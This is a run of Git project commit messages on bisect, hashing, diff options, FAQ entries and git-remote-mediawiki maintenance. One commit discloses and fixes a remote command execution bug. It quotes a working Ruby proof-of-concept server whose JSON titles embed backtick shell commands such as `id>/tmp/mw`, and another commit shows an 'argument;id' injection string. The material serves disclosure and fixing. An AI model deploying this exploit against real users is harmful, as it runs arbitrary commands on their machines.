Extend the oidset_parse_file() API and allow it to take a callback
that can be used to die (e.g. when an inappropriate input is read)
or modify the object name read (e.g. when a tag pointing at a commit
is read, and the caller wants a commit object name), and use it in
the code that handles ignore list.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Only skip diffstats when both oids are valid and identical. This check
was causing both false-positives (files included in diffstats with no
actual changes (0 lines modified) and false-negatives (showing 0 lines
modified in stats when files had actually changed).
Also replaced same_contents with may_differ to avoid confusion.
Signed-off-by: Thomas Guyot-Sionnest <tguyot@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This reverts commit f39ad38410.
That commit was trying to silence a type-punning warning on older
versions of gcc. However, its analysis was all wrong. I didn't notice
that we _were_ in fact type-punning because there are two versions of
put_be32(): one that uses casts and unaligned loads, and another that
uses bitshifts. I looked at the latter, but on my platform we were
defaulting to the former.
However, as of the previous commit, we'll always use the bitshift
version. So we can drop this hackery to avoid the warning, making the
code slightly cleaner.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our put_be32() routine and its variants (get_be32(), put_be64(), etc)
has two implementations: on some platforms we cast memory in place and
use nothl()/htonl(), which can cause unaligned memory access. And on
others, we pick out the individual bytes using bitshifts.
This introduces extra complexity, and sometimes causes compilers to
generate warnings about type-punning. And it's not clear there's any
performance advantage.
This split goes back to 660231aa97 (block-sha1: support for
architectures with memory alignment restrictions, 2009-08-12). The
unaligned versions were part of the original block-sha1 code in
d7c208a92e (Add new optimized C 'block-sha1' routines, 2009-08-05),
which says it is:
Based on the mozilla SHA1 routine, but doing the input data accesses a
word at a time and with 'htonl()' instead of loading bytes and shifting.
Back then, Linus provided timings versus the mozilla code which showed a
27% improvement:
https://lore.kernel.org/git/alpine.LFD.2.01.0908051545000.3390@localhost.localdomain/
However, the unaligned loads were either not the useful part of that
speedup, or perhaps compilers and processors have changed since then.
Here are times for computing the sha1 of 4GB of random data, with and
without -DNO_UNALIGNED_LOADS (and BLK_SHA1=1, of course). This is with
gcc 10, -O2, and the processor is a Core i9-9880H.
[stock]
Benchmark #1: t/helper/test-tool sha1 <foo.rand
Time (mean ± σ): 6.638 s ± 0.081 s [User: 6.269 s, System: 0.368 s]
Range (min … max): 6.550 s … 6.841 s 10 runs
[-DNO_UNALIGNED_LOADS]
Benchmark #1: t/helper/test-tool sha1 <foo.rand
Time (mean ± σ): 6.418 s ± 0.015 s [User: 6.058 s, System: 0.360 s]
Range (min … max): 6.394 s … 6.447 s 10 runs
And here's the same test run on an AMD A8-7600, using gcc 8.
[stock]
Benchmark #1: t/helper/test-tool sha1 <foo.rand
Time (mean ± σ): 11.721 s ± 0.113 s [User: 10.761 s, System: 0.951 s]
Range (min … max): 11.509 s … 11.861 s 10 runs
[-DNO_UNALIGNED_LOADS]
Benchmark #1: t/helper/test-tool sha1 <foo.rand
Time (mean ± σ): 11.744 s ± 0.066 s [User: 10.807 s, System: 0.928 s]
Range (min … max): 11.637 s … 11.863 s 10 runs
So the unaligned loads don't seem to help much, and actually make things
worse. It's possible there are platforms where they provide more
benefit, but:
- the non-x86 platforms for which we use this code are old and obscure
(powerpc and s390).
- the main caller that cares about performance is block-sha1. But
these days it is rarely used anyway, in favor of sha1dc (which is
already much slower, and nobody seems to have cared that much).
Let's just drop unaligned versions entirely in the name of simplicity.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reimplement the `bisect_next()` and the `bisect_auto_next()` shell functions
in C and add the subcommands to `git bisect--helper` to call them from
git-bisect.sh .
bisect_auto_next() function returns an enum bisect_error type as whole
`git bisect` can exit with an error code when bisect_next() does.
Return an error when `bisect_next()` fails, that fix a bug on shell script
version.
Using `--bisect-next` and `--bisect-auto-next` subcommands is a
temporary measure to port shell function to C so as to use the existing
test suite. As more functions are ported, `--bisect-auto-next`
subcommand will be retired and will be called by some other methods.
Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As there can be other revision walks after bisect_next_all(),
let's add a call to a function to clear all the marks at the
end of bisect_next_all().
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reimplement the `bisect_autostart()` shell function in C and add the
C implementation from `bisect_next()` which was previously left
uncovered.
Add `--bisect-autostart` subcommand to be called from git-bisect.sh.
Using `--bisect-autostart` subcommand is a temporary measure to port
the shell function to C so as to use the existing test suite. As more
functions are ported, this subcommand will be retired and
bisect_autostart() will be called directly by `bisect_state()`.
Change behavior of shell script that returned success when user aborted
the bisection.
Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The update sample hook has the zero OID hardcoded as 40 zeros. However,
with the introduction of SHA-256 support, this assumption no longer
holds true. Replace the hardcoded $z40 with a call to
git hash-object --stdin </dev/null | tr '[0-9a-f]' '0'
so the sample hook becomes hash-agnostic.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The pre-push sample hook has the zero OID hardcoded as 40 zeros.
However, with the introduction of SHA-256 support, this assumption no
longer holds true. Replace the hardcoded $z40 with a call to
git hash-object --stdin </dev/null | tr '[0-9a-f]' '0'
so the sample hook becomes hash-agnostic.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The preferred form for a command substitution is $() over ``. Use this
form for the command substitution in the sample hook.
The preferred form for conditional tests is to use `test` over [].
Replace [] with `test`.
Finally, replace all instances of "sha" with "oid".
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git fetch --all --ipv4/--ipv6" forgot to pass the protocol options
to instances of the "git fetch" that talk to individual remotes,
which has been corrected.
* ar/fetch-ipversion-in-all:
fetch: pass --ipv4 and --ipv6 options to sub-fetches
Update to command line completion (in contrib/)
* dl/complete-format-patch-recent-features:
contrib/completion: complete options that take refs for format-patch
"git remote set-head" that failed still said something that hints
the operation went through, which was misleading.
* cs/don-t-pretend-a-failed-remote-set-head-succeeded:
remote: don't show success message when set-head fails
There is a logic to estimate how many objects are in the
repository, which is mean to run once per process invocation, but
it ran every time the estimated value was requested.
* jk/dont-count-existing-objects-twice:
packfile: actually set approximate_object_count_valid
"git for-each-ref" and friends that list refs used to allow only
one --merged or --no-merged to filter them; they learned to take
combination of both kind of filtering.
* al/ref-filter-merged-and-no-merged:
Doc: prefer more specific file name
ref-filter: make internal reachable-filter API more precise
ref-filter: allow merged and no-merged filters
Doc: cover multiple contains/no-contains filters
t3201: test multiple branch filter combinations
The 'meld' backend of the "git mergetool" learned to give the
underlying 'meld' the '--auto-merge' option, which would help
reduce the amount of text that requires manual merging.
* ls/mergetool-meld-auto-merge:
mergetool: allow auto-merge for meld to follow the vim-diff behavior
"git index-pack" learned to resolve deltified objects with greater
parallelism.
* jt/threaded-index-pack:
index-pack: make quantum of work smaller
index-pack: make resolve_delta() assume base data
index-pack: calculate {ref,ofs}_{first,last} early
index-pack: remove redundant child field
index-pack: unify threaded and unthreaded code
index-pack: remove redundant parameter
Documentation: deltaBaseCacheLimit is per-thread
"format-patch --range-diff=<prev> <origin>..HEAD" has been taught
not to ignore <origin> when <prev> is a single version.
* es/format-patch-interdiff-cleanup:
format-patch: use 'origin' as start of current-series-range when known
diff-lib: tighten show_interdiff()'s interface
diff: move show_interdiff() from its own file to diff-lib
If a user is cloning a SHA-1 repository with GIT_DEFAULT_HASH set to
"sha256", then we can end up with a repository where the repository
format version is 0 but the extensions.objectformat key is set to
"sha256". This is both wrong (the user has a SHA-1 repository) and
nonfunctional (because the extension cannot be used in a v0 repository).
This happens because in a clone, we initially set up the repository, and
then change its algorithm based on what the remote side tells us it's
using. We've initially set up the repository as SHA-256 in this case,
and then later on reset the repository version without clearing the
extension.
We could just always set the extension in this case, but that would mean
that our SHA-1 repositories weren't compatible with older Git versions,
even though there's no reason why they shouldn't be. And we also don't
want to initialize the repository as SHA-1 initially, since that means
if we're cloning an empty repository, we'll have failed to honor the
GIT_DEFAULT_HASH variable and will end up with a SHA-1 repository, not a
SHA-256 repository.
Neither of those are appealing, so let's tell the repository
initialization code if we're doing a reinit like this, and if so, to
clear the extension if we're using SHA-1. This makes sure we produce a
valid and functional repository and doesn't break any of our other use
cases.
Reported-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Spaces are replaced with tabs when possible. In some cases just
replacing spaces with tabs would break readability, so it was left as it
is.
Signed-off-by: Serg Tereshchenko <serg.partizan@gmail.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
We try to flush the output from diff-highlight whenever we see a blank
line. That lets you see the output for each commit as soon as it is
generated, even if Git is still chugging away at a diff, or traversing
to find the next commit.
However, our "blank line" match checks length($_). That won't ever be
true, because we haven't chomped the line ending. As a result, we never
flush. Instead, let's use a simple regex which handles line endings in
with the end-of-line marker.
This has been broken since the initial version in 927a13fe87 (contrib:
add diff highlight script, 2011-10-18). Probably nobody noticed because:
- most output is big enough, or comes fast enough, that it flushes
anyway. And it can be difficult to notice the difference between
"show a commit, then pause" and "pause, then show two commits". I
only noticed because I was viewing "git log" output on a repo with a
very slow textconv filter.
- if stdout is going to the terminal (and not another pager like
less), then the flush isn't necessary. So any manual testing would
show it appearing to work.
You can easily see the difference with something like:
echo '* diff=slow' >>.gitattributes
git -c diff.slow.textconv='sleep 1; cat' \
-c pager.log='diff-highlight | less' \
log -p
That should generate one commit every second or so (more if it touches
multiple files), but without this patch it waits for many seconds before
generating several pages of output.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The variable core_partial_clone_filter_default has been unused since
fa3d1b63e8 ("promisor-remote: parse remote.*.partialclonefilter",
2019-06-25), when Git was changed to refer to
remote.*.partialclonefilter as the default filter when fetching in a
partial clone, but (perhaps inadvertently) there was no fallback to
core.partialclonefilter.
One alternative is to add the fallback, but the aforementioned change
was made more than a year ago and I have not heard of any complaints
regarding this matter. In addition, there is currently no mention of
core.partialclonefilter in the user documentation. So it seems best to
reaffirm that Git will only support remote.*.partialclonefilter.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since e4597aae65 (run test suite without dashed git-commands in PATH,
2009-12-02), we stopped running our tests with `git-foo` binaries found
at the top-level directory of a freshly built source tree; instead we
have placed only `git` and selected `git-foo` commands that must be on
`$PATH` in `bin-wrappers/` and prepended that `bin-wrappers/` to the
`PATH` used in the test suite. We did that to catch the tests and
scripted Git commands that still try to use the dashed form.
Since CI jobs will not install the built Git to anywhere, and the
hardlinks we make at the top-level of the source tree for `git-add` and
friends are not even used during tests, they are pure waste of resources
these days.
Thanks to the newly invented `SKIP_DASHED_BUILT_INS` knob, we can now
skip creating these links in the source tree. So let's do that.
Note that this change introduces a subtle change of behavior: when Git's
`cmd_main()` calls `setup_path()`, it inserts the value of
`GIT_EXEC_PATH` (defaulting to `<prefix>/libexec/git-core`) at the
beginning of the environment variable `PATH`. This is necessary to find
e.g. scripted commands that are installed in that location. For the
purposes of Git's test suite, the `bin-wrappers/` scripts override
`GIT_EXEC_PATH` to point to the top-level directory of the source code.
In other words, if a scripted command had used a dashed invocation of a
built-in Git command, it would not have been caught previously, which is
fixed by this change.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For a long time already, the non-dashed form of the built-ins is the
recommended way to write scripts, i.e. it is better to call `git merge
[...]` than to call `git-merge [...]`.
While Git still supports the dashed form (by hard-linking the `git`
executable to the dashed name in `libexec/git-core/`), in practice, it
is probably almost irrelevant.
However, we *do* care about keeping people's scripts working (even if
they were written before the non-dashed form started to be recommended).
Keeping this backwards-compatibility is not necessarily cheap, though:
even so much as amending the tip commit in a git.git checkout will
require re-linking all of those dashed commands. On this developer's
laptop, this makes a noticeable difference:
$ touch version.c && time make
CC version.o
AR libgit.a
LINK git-bugreport.exe
[... 11 similar lines ...]
LN/CP git-remote-https.exe
LN/CP git-remote-ftp.exe
LN/CP git-remote-ftps.exe
LINK git.exe
BUILTIN git-add.exe
[... 123 similar lines ...]
BUILTIN all
SUBDIR git-gui
SUBDIR gitk-git
SUBDIR templates
LINK t/helper/test-fake-ssh.exe
LINK t/helper/test-line-buffer.exe
LINK t/helper/test-svn-fe.exe
LINK t/helper/test-tool.exe
real 0m36.633s
user 0m3.794s
sys 0m14.141s
$ touch version.c && time make SKIP_DASHED_BUILT_INS=1
CC version.o
AR libgit.a
LINK git-bugreport.exe
[... 11 similar lines ...]
LN/CP git-remote-https.exe
LN/CP git-remote-ftp.exe
LN/CP git-remote-ftps.exe
LINK git.exe
BUILTIN git-receive-pack.exe
BUILTIN git-upload-archive.exe
BUILTIN git-upload-pack.exe
BUILTIN all
SUBDIR git-gui
SUBDIR gitk-git
SUBDIR templates
LINK t/helper/test-fake-ssh.exe
LINK t/helper/test-line-buffer.exe
LINK t/helper/test-svn-fe.exe
LINK t/helper/test-tool.exe
real 0m23.717s
user 0m1.562s
sys 0m5.210s
Also, `.zip` files do not have any standardized support for hard-links,
therefore "zipping up" the executables will result in inflated disk
usage. (To keep down the size of the "MinGit" variant of Git for
Windows, which is distributed as a `.zip` file, the hard-links are
excluded specifically.)
In addition to that, some programs that are regularly used to assess
disk usage fail to realize that those are hard-links, and heavily
overcount disk usage. Most notably, this was the case with Windows
Explorer up until the last couple of Windows 10 versions. See e.g.
https://github.com/msysgit/msysgit/issues/58.
To save on the time needed to hard-link these dashed commands, with the
plan to eventually stop shipping with those hard-links on Windows, let's
introduce a Makefile knob to skip generating them.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is a hard-coded list of `.pdb` files to copy. But we are about to
introduce the `SKIP_DASHED_BUILT_INS` knob in the `Makefile`, which
might make this hard-coded list incorrect.
Let's switch to a dynamically-generated list instead.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To avoid branch names with a loaded history, we already started to avoid
using the name "master" in a couple instances.
The `t3200-branch.sh` script uses variations of this name for branches
other than the default one. So let's change those names, as
"lowest-hanging fruits" in the effort to use more inclusive naming
throughout Git's source code. While at it, make those branch names
independent from the default branch name.
In this particular instance, this rename requires a couple of
non-trivial adjustments, as the aligned output depends on the maximum
length of the displayed branches (which we now changed), and also on the
alphabetical order (which we now changed, too).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an ongoing effort to avoid non-inclusive language, let's avoid using
the branch name "master" in a code comment.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the ongoing effort to make the Git project a more inclusive place,
let's try to avoid names like "master" where possible.
In this instance, the use of the term `slave` is unfortunately enshrined
in IO::Pty's API. We simply cannot avoid using that word here. But at
least we can get rid of the usage of the word `master` and hope that
IO::Pty will be eventually adjusted, too.
Guessing that IO::Pty might follow Python's lead, we replace the name
`master` by `parent` (hoping that IO::Pty will adopt the parent/child
nomenclature, too).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous commit introduced ---merge-base a way to take the diff
between the working tree or index and the merge base between an arbitrary
commit and HEAD. It makes sense to extend this option to support the
case where two commits are given too and behave in a manner identical to
`git diff A...B`.
Introduce the --merge-base flag as an alternative to triple-dot
notation. Thus, we would be able to write the above as
`git diff --merge-base A B`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the use of run_git_unquoted() completely with a use of "sh -c"
suggested by Jeff King, i.e.:
sh -c '"$@" 2>/dev/null' -- echo sneaky 'argument;id'
I don't think this is needed now for any potential RCE issue. The
$remotename argument is ultimately picked by the local user (and
similarly, the $local variable comes from a user-supplied
refspec).
But completely eliminating the use of unquoted shell arguments has a
value in and of itself, by making the code easier to review. As noted
in an earlier commit I think the use of IPC::Open3 would be too
verbose here, but this "sh -c" trick strikes the right balance between
readability and semantic sanity.
Suggested-by: Jeff King <peff@peff.net>
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Explicitly annotate the invocations of run_git() which don't use
quoted arguments. I'm not converting these to run_git_quoted() because
these invocations pipe stderr to /dev/null, which the Perl open() API
doesn't support.
We could do a quoted version of this with IPC::Open3, but I don't
think it's worth it to go through that here. Let's instead just mark
these sites, and comment on why it's OK to use the variables we're
using.
This eliminates the last uses of run_git(), so we can remove the alias
for it introduced in an earlier commit.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change those callsites that are able to call run_safe() with a quoted
list of arguments to do so.
This fixes a RCE bug in this transport helper reported by Joern
Schneeweisz to the git-security mailing list. The issue is being made
public due to the relative obscurity of the remote-mediawiki code.
The security issue is that we'd execute a command like this via Perl's
"open -|", where the $name is taken directly from the api.php
response. So that a JSON response of e.g.:
[...]"title":"`id>/tmp/mw`:Main Page"[..]
Would result in an invocation of:
git config --add remote.origin.namespaceCache "`id>/tmp/mw`:notANameSpace"
>From code such as this, which is being changed by this patch:
run_git(qq(config --add remote.${remotename}.namespaceCache "${name}:${store_id}"));
So we'd execute an arbitrary command, and also put
"remote.origin.namespaceCache=:notANameSpace" in the config. With this
change we quote all of this, so now we'll simply write
"remote.origin.namespaceCache=`id>/tmp/x`:notANameSpace" into the
config, and not execute any remote commands.
About the implementation: as noted in [1] (see also [2]) this style of
invoking open() has compatibility issues on Windows up to Perl
5.22. However, Johannes Schindelin notes that we shouldn't worry about
Windows in this context because (quoting a private E-Mail of his):
1. The mediawiki helper has never been shipped as part of an
official Git for Windows version. Neither has it ever been part
of an official MSYS2 package. Which means that Windows users
who want to use the mediawiki helper have to build Git
themselves, which not many users seem to do.
2. The last Git for Windows version to ship with Perl v5.22.x was
Git for Windows v2.11.1; Since Git for Windows
v2.12.0 (released on February 25th, 2017), only newer Perl
versions were included.
So let's just use this open() API. Grepping around shows that various
other Perl code we ship such as gitweb etc. uses this way of calling
open(), so we shouldn't have any issues with compatibility.
For further reference and future testing, here's working exploit code
provided by Joern:
#!/usr/bin/ruby
# git client side RCE via `mediawiki` remote proof of concept
# Joern Schneeweisz - GitLab Security Research Team
require 'sinatra'
set bind: '0.0.0.0'
if not ARGV[0]
puts "Please provide the shell command to be execucted."
exit -1
end
cmd = ARGV[0]
all_pages = sprintf('{"limits":{"allpages":500},"query":{"allpages":[{"pageid":1,"ns":3,"title":"`%s`:Main Page"}]}}', cmd)
revs = sprintf('{"query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0,"user":"MediaWiki default","timestamp":"2020-09-04T20:25:08Z","contentformat":"text/x-wiki","contentmodel":"wikitext","comment":"","*":"<al:MyLanguage/Help:Contents]"}]}}}}', cmd)
mainpage= sprintf('{"batchcomplete":"","query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0}]}}}}',cmd)
post '/api.php' do
if params[:list] == 'allpages'
return all_pages
end
if params[:prop] == 'revisions'
return revs
end
return mainpage
end
Which:
[...] should be run like: `ruby wiki.rb 'id>/tmp/mw'`. Now when
being cloned with `git clone mediawiki::http://localhost:4567` the
file `/tmp/mw` will be created during the clone process,
containing the output of `id`.
1. https://perldoc.perl.org/functions/open.html#Opening-a-filehandle-into-a-command
2. https://perldoc.perl.org/perlipc.html#Safe-Pipe-Opens
Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Invoking commands as "git $args" doesn't quote $args. Let's support
["git", $args] as well, and create corresponding run_git_quoted() and
run_git_unquoted() aliases for subsequent changes when we move the
code over to the new style of invoking this function. At that point
we'll delete the then-unused run_git() wrapper.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
These tests consistently fail for me, and were failing before any of
the changes in this series. As noted in [1] there are some known
intermittent test failures. Let's mark these as failing so we can have
an otherwise passing test suite.
We need to add an extra test_path_is_file() here because since
d572f52a64 ("test_cmp: diagnose incorrect arguments", 2020-08-09)
test_cmp has errored out with a BUG if one of the test arguments
doesn't exist, without that the test would still fail even without
test_expect_failure().
1. https://github.com/Git-Mediawiki/Git-Mediawiki/issues/56
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace the use of screen-scraping in the test environment
installation with simply invoking MediaWiki's command-line
installer.
The old code being deleted here relied on our own hardcoded POST
parameter names & the precise layout of MediaWiki's GUI installer at a
given version. Somewhere between [1] and now this inevitably broke.
As far as I can tell there was never a reason for this screen-scraping
hack, when [1] was introduced it hardcoded MediaWiki 1.19.0, the CLI
installer was introduced in 1.17.0. Perhaps the authors weren't aware
of it, or this code was written for an older version.
This allows us to simply delete our own template version of
LocalSettings.php, it'll instead be provided by the CLI installer.
While we're at it let's fix a few things, these changes weren't
practical to split up (I'd need to fix code I was about to mostly
delete)
* Use MediaWiki's own defaults where possible, e.g. before we'd name
the database "wikidb.sqlite", now we'll simply use whatever name
MediaWiki prefers (currently my_wiki.sqlite) by only supplying the
directory name the SQLite file will be dropped into, not the full
path.
* Put all of our database & download assets into a new "mediawiki/"
folder. This makes it easier to reason about as the current &
template "backup" database the tests keep swapping around live
next to each other.
This'll also prevent future potential breakage as there isn't a
single SQLite database. MediaWiki also creates a job queue
database and a couple of cache databases. In practice it seems we
got away with not resetting these when we reset the main database,
but it's the sort of thing that could break in the future (reset,
main store doesn't have the article, but the cache does).
* The "delete" function now only deletes the MediaWiki installation
& database, not the downloaded .tar.gz file. This makes us
friendlier to a developer on a slow connection.
1. 5ef6ad1785 ("git-remote-mediawiki: scripts to install, delete and
clear a MediaWiki", 2012-07-06)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace the use of the "open" pragma with a three-arg open in the
places that actually care about UTF-8, while leaving those that
don't (the config parsing).
Unlike the previous "encoding" pragma change this isn't needed for
compatibility with anything. I just think it's easier to read code
that has localized effects than code that changes global settings.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The use of the encoding pragma has been a hard error since Perl
5.18 (released in 2013).
What this script really wanted to do was to decode @ARGV and write out
some files with the UTF-8 PerlIO layer. Let's just do that explicitly
instead.
This explicitly does not retain the previous UTF-8 semantics of the
script. The "encoding" pragma had all sorts of global effects (program
text being UTF-8, stdin/stdout etc.). But the only thing that was
required was decoding @ARGV and writing out UTF-8 data, which is
currently facilitated with the "open" pragma.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the dispatch table code in test-gitmw.pl to use a hash where
subroutine references are the values. This is more obvious than a hash
where the values are strings we'll use to go searching around in the
symbol table for the function.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change UI messages to use "$dir/" instead of "$dir.". I think this is
less confusing when referring to an absolute directory path.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Convert `[]` to `test` and break if-then into separate lines, both of
which bring the style in line with Git's coding guidelines.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change code that used an ad-hoc "diff -b" invocation to use our
test_cmp helper instead. I'm also changing the order of arguments to
be the standard "test_cmp <expected> <actual>".
Using test_cmp has different semantics since the "-b" option to diff
causes it to ignore whitespace, but in these cases the use of "-b" was
just meaningless boilerplate. The desired semantics here are to
compare "git log" lines with know-good data, so we don't want to
ignore whitespace.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In more recent versions of MediaWiki this is a requirement, e.g. the
current stable version of 1.32.2.
The web installer now refuses our old 9 character password, the
command-line one (will be used in a subsequent change) will accept it,
but trying to use it in the web UI will emit an error asking the user
to reset the password. Let's use a password that'll just work and
allow us to log in as the admin user.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change a hardcoded user/password for the corresponding variable
defined in contrib/mw-to-git/t/test.config.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the hardcoded version 5 PHP versions to the version-agnostic
packages. Currently Debian stable's version is 7.3, and there's a
php7.3, php7.3-cli etc. package available (but no php5-*).
The corresponding version-less package is a dependency package which
depends on whatever the current stable version is. By not hardcoding
the version these instructions won't be out of date when the next
Debian/Ubuntu release happens.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is currently no easy way to take the diff between the working tree
or index and the merge base between an arbitrary commit and HEAD. Even
diff's `...` notation doesn't allow this because it only works between
commits. However, the ability to do this would be desirable to a user
who would like to see all the changes they've made on a branch plus
uncommitted changes without taking into account changes made in the
upstream branch.
Teach diff-index and diff (with one commit) the --merge-base option
which allows a user to use the merge base of a commit and HEAD as the
"before" side.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the future, we will be adding more --merge-base tests to this test
script. To prepare for that, rename the script accordingly and update
its description. Also, add two basic --merge-base tests that don't
require any functionality to be implemented yet.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a future commit, we will be using this function to implement
--merge-base functionality in various diff commands.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a future commit, we will teach run_diff_index() to accept more
options via flag bits. For now, change `cached` into a flag in the
`option` bitfield. The behaviour should remain exactly the same.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Users frequently have problems where two filenames differ only in case,
causing one of those files to show up consistently as being modified.
Let's add a FAQ entry that explains how to deal with that.
In addition, let's explain another common case where files are
consistently modified, which is when files using a smudge or clean
filter have not been run through that filter. Explain the way to fix
this as well.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A common scenario is for a user to apply a change to one branch and
cherry-pick it into another, then later revert it in the first branch.
This results in the change being present when the two branches are
merged, which is confusing to many users.
We already have documentation for how this works in `git merge`, but it
is clear from the frequency with which this is asked that it's hard to
grasp. We also don't explain to users that they are better off doing a
rebase in this case, which will do what they intended. Let's add an
entry to the FAQ telling users what's happening and advising them to use
rebase here.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In many projects, squash merges are commonly used, primarily to keep a
tidy history in the face of developers who do not use logically
independent, bisectable commits. As common as this is, this tends to
cause significant problems when squash merges are used to merge
long-running branches due to the lack of any new merge bases. Even very
experienced developers may make this mistake, so let's add a FAQ entry
explaining why this is problematic and explaining that regular merge
commits should be used to merge two long-running branches.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The refs update commands can be sent to the server side in two different
ways: GPG-signed or unsigned. We should run these two operations in the
same "Finally, tell the other end!" code block, but they are seperated
by the "Clear the status for each ref" code block. This will result in
a slight performance loss, because the failed atomic push will still
perform unnecessary preparations for shallow advertise and GPG-signed
commands buffers, and user may have to be bothered by the (possible) GPG
passphrase input when there is nothing to sign.
Add a new test case to t5534 to ensure GPG will not be called when the
GPG-signed atomic push fails.
Signed-off-by: Han Xin <hanxin.hx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add untracked files for the dist target directly using git archive
instead of calling tar cr to append them. This reduces the dependency
on external tools and gives the untracked files the same access times
and user information as tracked ones, integrating them seamlessly.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Allow users to append non-tracked files. This simplifies the generation
of source packages with a few extra files, e.g. containing version
information. They get the same access times and user information as
tracked files.
Signed-off-by: René Scharfe <l.s.r@web.de>
